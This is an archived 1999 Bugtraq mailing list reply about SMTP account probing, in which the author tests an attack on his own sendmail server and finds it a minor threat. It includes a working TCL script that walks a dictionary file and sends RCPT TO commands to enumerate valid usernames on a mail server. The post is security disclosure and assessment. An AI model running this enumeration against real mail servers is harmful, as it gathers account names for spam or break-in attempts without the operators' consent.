Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SMTP server account probing

From: dgale () DATAPEX COM (David Gale)
Date: Tue, 9 Mar 1999 13:14:06 -0500

On Mon, 8 Mar 1999, Brett Glass wrote:


Several ISPs throughout the Net are reporting an attack described at

http://www.l8r.com/nwa/nwa1.htm


Using /usr/dict/words on my linux box and the TCL code below I ran this
attack against a sendmail (8.9.2) mailserver which uses virtual user
tables and a lengthy aliases database.

The result was the load went up slightly and log entries consumed some
disk space. All in All, Minimal threat to service. I would not call this a
DOS attack in our configuration.


#!/usr/bin/tclsh

set infile [open /usr/dict/words r]
set sock [socket someserver.example.com 25]

puts $sock "HELO remotehost.example.com"
puts $sock "MAIL FROM: user () example com"

while {[eof $infile] != 1} {
        gets $infile input
        puts $sock "RCPT TO: $input"
        flush $sock
        gets $sock output
        if {[string range $output 0 2] != "550"} {
                puts "Valid Username! $input"
        }
}
close $sock
exit


DG.
Previous By Date Next
Previous By Thread Next

Current thread: